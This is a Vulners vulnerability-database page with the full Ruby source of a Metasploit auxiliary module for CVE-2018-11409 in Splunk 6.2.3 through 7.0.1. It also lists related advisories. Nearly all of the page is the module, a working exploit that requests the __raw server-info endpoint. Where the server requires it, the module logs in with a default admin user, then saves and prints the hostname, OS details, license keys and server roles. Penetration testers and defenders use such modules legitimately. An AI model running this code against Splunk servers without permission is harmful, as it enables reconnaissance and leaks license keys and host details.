Vulners
Lucene search
Splunk __raw Server Info Disclosure
🗓️ 31 Aug 2024 00:00:00Reported by h00die, KoF2002, n00bhaxor, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 205 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Splunk < 7.0.1 - Information Disclosure Vulnerability | 9 Jun 201800:00 | – | zdt |
 | CVE-2018-11409 | 28 Dec 202316:51 | – | circl |
 | Splunk Information Disclosure Vulnerability | 11 Jun 201800:00 | – | cnvd |
 | CVE-2018-11409 | 8 Jun 201812:00 | – | cve |
 | CVE-2018-11409 | 8 Jun 201812:00 | – | cvelist |
 | Splunk < 7.0.1 - Information Disclosure | 8 Jun 201800:00 | – | exploitdb |
 | Splunk 7.0.1 - Information Disclosure | 8 Jun 201800:00 | – | exploitpack |
 | U.S. Dept Of Defense: Splunk Sensitive Information Disclosure @████████ | 3 Feb 202307:36 | – | hackerone |
 | Splunk __raw Server Info Disclosure | 28 Dec 202319:50 | – | metasploit |
 | Splunk <=7.0.1 - Information Disclosure | 13 Jun 202603:02 | – | nuclei |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Splunk __raw Server Info Disclosure ',
'Description' => %q{
Splunk 6.2.3 through 7.0.1 allows information disclosure by appending
/__raw/services/server/info/server-info?output_mode=json to a query.
Versisons 6.6.0 through 7.0.1 require authentication.
},
'License' => MSF_LICENSE,
'Author' => [
'n00bhaxor', # msf module
'KOF2002', # original PoC
'h00die' # 6.6.0+
],
'References' => [
[ 'EDB', '44865' ],
[ 'URL', 'https://web.archive.org/web/20201124061756/https://www.splunk.com/en_us/product-security/announcements-archive/SP-CAAAP5E.html'],
[ 'CVE', '2018-11409']
],
'DisclosureDate' => '2018-06-08',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(8000),
OptString.new('USERNAME', [ false, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
OptString.new('TARGETURI', [ true, 'The URI of the Splunk Application', ''])
]
)
end
def authenticate
login_url = normalize_uri(target_uri.path, 'en-US', 'account', 'login')
res = send_request_cgi({
'method' => 'GET',
'uri' => login_url
})
unless res
fail_with(Failure::Unreachable, 'No response received for authentication request')
end
cval_value = res.get_cookies.match(/cval=([^;]+)/)[1]
unless cval_value
fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication')
end
auth_payload = {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cval' => cval_value,
'set_has_logged_in' => 'false'
}
res = send_request_cgi({
'method' => 'POST',
'uri' => login_url,
'keep_cookies' => true,
'vars_post' => auth_payload
})
unless res && res.code == 200
fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')
end
print_good('Successfully authenticated on the Splunk instance')
end
def get_contents
request = {
'uri' => normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'services', 'server', 'info', 'server-info'),
'keep_cookies' => true,
'vars_get' => {
'output_mode' => 'json'
}
}
res = send_request_cgi(request)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
# 200 is <6.6.0 success, 303 is >=6.6.0 likely success but need auth first
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response(response code: #{res.code})") unless res.code == 200 || res.code == 303
res
end
def run
# on 6.2.x-6.5.x this will work as its unauth
res = get_contents
# if we hit 6.6.0 - 7.1.0 we need to auth first
if res.body == '{"messages":[{"type":"ERROR","text":"See Other"}]}'
print_status('Authentication required, logging in and re-attempting')
authenticate
res = get_contents
end
j = res.get_json_document
loot_path = store_loot('splunk.system.status', 'application/json', datastore['RHOST'], res.body, 'system_status.json')
print_good("Output saved to #{loot_path}")
print_good("Hostname: #{j['entry'][0]['content']['host_fqdn']}")
print_good("CPU Architecture: #{j['entry'][0]['content']['cpu_arch']}")
print_good("Operating System: #{j['entry'][0]['content']['os_name']}")
print_good("OS Build: #{j['entry'][0]['content']['os_build']}")
print_good("OS Version: #{j['entry'][0]['content']['os_version']}")
print_good("Splunk Version: #{j['generator']['version']}")
print_good("Trial Version?: #{j['entry'][0]['content']['isTrial']}")
print_good("Splunk Forwarder?: #{j['entry'][0]['content']['isForwarding']}")
print_good("Splunk Product Type: #{j['entry'][0]['content']['product_type']}")
print_good("License State: #{j['entry'][0]['content']['licenseState']}")
print_good("License Key\(s\): #{j['entry'][0]['content']['licenseKeys']}")
print_good("Splunk Server Roles: #{j['entry'][0]['content']['server_roles']}")
converted_time = DateTime.strptime(j['entry'][0]['content']['startup_time'].to_s, '%s').strftime('%Y-%m-%d %H:%M:%S')
print_good("Splunk Server Startup Time: #{converted_time}")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 35.3
EPSS0.92221